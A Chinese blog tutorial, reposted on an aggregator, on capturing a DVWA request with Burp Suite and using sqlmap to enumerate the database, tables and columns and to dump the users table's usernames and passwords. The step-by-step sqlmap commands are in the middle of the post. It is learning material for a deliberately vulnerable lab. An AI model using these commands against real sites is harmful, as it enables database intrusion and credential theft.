使用burpsuite抓包 + sql工具注入 dvwa初级靶场

这篇具有很好参考价值的文章主要介绍了使用burpsuite抓包 + sql工具注入 dvwa初级靶场。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

使用burpsuite抓包 + sql工具注入 dvwa靶场

记录一下自己重新开始学习web安全之路②。

一、准备工作

1.工具准备 sqlmap + burpsuite

2.浏览器准备 火狐浏览器 + 设置代理。

首先,先设置一下火狐浏览器的代理

burpsuite扫描dvwa,web,网络,数据库,系统安全

http代理地址为127.0.0.0.1 ,端口为8080

3.burpsuite 准备 将burpsuite的抓包功能打开。

注:burpsuite 不抓127.0.0.1 /dvwa-master的包,所以需要用本地网卡 ip/dvwa-master 访问

怎么查到本地网卡ip?

在cmd中输入ipconfig

burpsuite扫描dvwa,web,网络,数据库,系统安全

得到本地网卡ip 192.168.92.1

如果是无线网,那么找无线网适配器的IPV4地址

burpsuite扫描dvwa,web,网络,数据库,系统安全

通过本地网卡ip进入dvwa,把安全等级改为low等级,,设置代理之后。

burpsuite扫描dvwa,web,网络,数据库,系统安全

在搜索框输入之后,点击submit。

通过burpsuite抓包得到

burpsuite扫描dvwa,web,网络,数据库,系统安全

注:抓到的包必须是注入点的包

如:
(GET /dvwa-master/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1)即有?id=1,2等

然后在burpsuite中 点击Action — Save item 保存到本地。

保存之后,利用sqlmap工具。首先要在cmd中先来到sqlmap的文件路径下。

目标:拿账号密码(数据)

1.查询数据库的名称 (dvwa)

python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” --current-db

burpsuite扫描dvwa,web,网络,数据库,系统安全

burpsuite扫描dvwa,web,网络,数据库,系统安全

-r // 指定读取本地文件

–current-db //列出当前网站数据库名称

2.查询数据表的名称 (guestbook 、users)

python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa --tables

burpsuite扫描dvwa,web,网络,数据库,系统安全

burpsuite扫描dvwa,web,网络,数据库,系统安全

-D //指定数据库名称

–tables //数据表

3.查询数据列的名称 (user 、password)

python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa -T users --columns

burpsuite扫描dvwa,web,网络,数据库,系统安全

burpsuite扫描dvwa,web,网络,数据库,系统安全

-T //指定数据表的名称

–columns //列出数据列的名称

4.读取数据 (user、password)

python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa -T users -C user,password --dump

burpsuite扫描dvwa,web,网络,数据库,系统安全

burpsuite扫描dvwa,web,网络,数据库,系统安全

-C //指定数据列的名称

–dump // 读取数据

拿账号密码时遇到的问题:

1.首先是burpsuite抓包时 火狐浏览器显示

burpsuite扫描dvwa,web,网络,数据库,系统安全

通过百度得到解决办法:

burpsuite扫描dvwa,web,网络,数据库,系统安全文章来源地址https://www.toymoban.com/news/detail-729973.html

2.sqlmap,更新问题,可以不用管,但是一开始看到有警告,去官网下了一个新的sqlmap即可。

到了这里,关于使用burpsuite抓包 + sql工具注入 dvwa初级靶场的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【网络安全】DVWA靶场实战&BurpSuite内网渗透

    我们先来认识一下BurpSuite中有哪些攻击模式,然后开始实战操作 下面攻击案例即将使用,对单个参数进行攻击破解 联想战争中狙击手的作用,一次只能击杀一名敌人 联想古代的攻城锤,特点就是攻击范围比狙击手大,但是效率不一定高 可以设置多个攻击字段,但是payload值

    2024年02月13日
    浏览(56)
  • 超细DVWA靶场搭建--(小黑栈渗透测试初级篇1)

    前言:对于渗透测试这块,最初阶段建议先学习一下前、后端知识,然后再学习一到两门语言,这样子方便后续的成为大佬做好基石。渗透测试的方向上建议先web渗透 --  APP渗透 --内网渗透,多打靶场多理解漏洞的原理和工具的利用,在学习的过程中遇到的问题多做笔记和记

    2024年01月21日
    浏览(51)
  • Day1使用Burpsuite抓包工具抓包,改变UA头使得手机和pc端界面互相转换

    1.前期工作:安装Burpsuite工具这里网上有许多教程,大致步骤如下: 找到安装包然后解压缩,然后双击 安装jdk,然后就是配置环境变量,如果是默认jdk安装路径没有更改路径的话就是跟如下一样 配置如下: (1)JAVA_HOME 变量值填写JAVA安装的路径,我的是C:Program FilesJavajd

    2024年02月10日
    浏览(41)
  • DVWA——SQL注入+盲注

    目的:执行特定sql语句,获得其他相关内容。 攻击方式:动态构造SQL语句 影响:数据库的脱裤、修改、甚至影响到操作系统。 漏洞原理:直接使用原始sql语句,没有代码审查 漏洞利用: 步骤1:判断是否存在注入漏洞: 步骤2:判断当前表字段个数?:通过order by 排序字段

    2024年02月07日
    浏览(53)
  • DVWA之sql注入——盲注

    1.1 布尔盲注 布尔很明显的Ture跟Fales,也就说它只会根据你的注入信息返回Ture跟Fales,也就没有了之前的报错 信息。 1.判断是否存在注入,注入的类型 不管输入框输入为何内容,页面上只会返回以下2种情形的提示: 满足查询条件则返回\\\"User ID exists in the database.\\\",不满足查询

    2024年02月05日
    浏览(61)
  • DVWA之SQL注入漏洞

    1、先确定正常和不正常的回显 回显,就是显示正在执行的批处理命令及执行的结果等。 输入1时,有回显,是正常的 数据库语句: select * from table where id =1 输入5时,有回显,是正常的 数据库语句: select * from table where id =5 输入6时,没有回显 数据库语句: select * from table

    2024年02月08日
    浏览(42)
  • DVWA-----SQL Injection(SQL手工注入)

    一、SQL注入 1.SQL注入原理  2.SQL注入分类 3.SQL注入思路 4.SQL注入绕过方法 二、SQL注入漏洞的分析         1. 定义 2. 原因 3.危害 三、Web 程序三层架构 四、SQL Injection 1.LOW 2.Medium  3.High  4.Impossible          通过把恶意的sql命令插入web表单递交给服务器,或者输入域名或

    2024年02月02日
    浏览(42)
  • DVWA-SQL Injection SQL注入

    SQL注入,是指将特殊构造的恶意SQL语句插入Web表单的输入或页面请求的查询字符串中,从而欺骗后端Web服务器以执行该恶意SQL语句。 成功的 SQL 注入漏洞可以从数据库中读取敏感数据、修改数据库数据(插入/更新/删除)、对数据库执行管理操作 (例如关闭 DBMS),恢复 DBM

    2024年02月08日
    浏览(38)
  • DVWA 之 SQL注入(非盲注)

    步骤: 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.下载数据 输入1,查询成功: 输入1’and ‘1’ =’2,查询失败,返回结果为空: 输入1’or ‘1 ’=’1,查询

    2024年02月04日
    浏览(46)
  • DVWA平台搭建+SQL注入实验详解

    实现1: 实现DVWA平台的搭建,为后续的SQL注入提供练习环境; 实现2: 进行SQL注入的练习,目的是了解因web应用程序对用户输入数据的合法性没有判断或过滤不严,而造成的危害,以便后续更好地掌握对其的防御手段,提高网络安全意识; 1、下载phpstudy安装包 (注意:如果

    2024年02月05日
    浏览(53)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包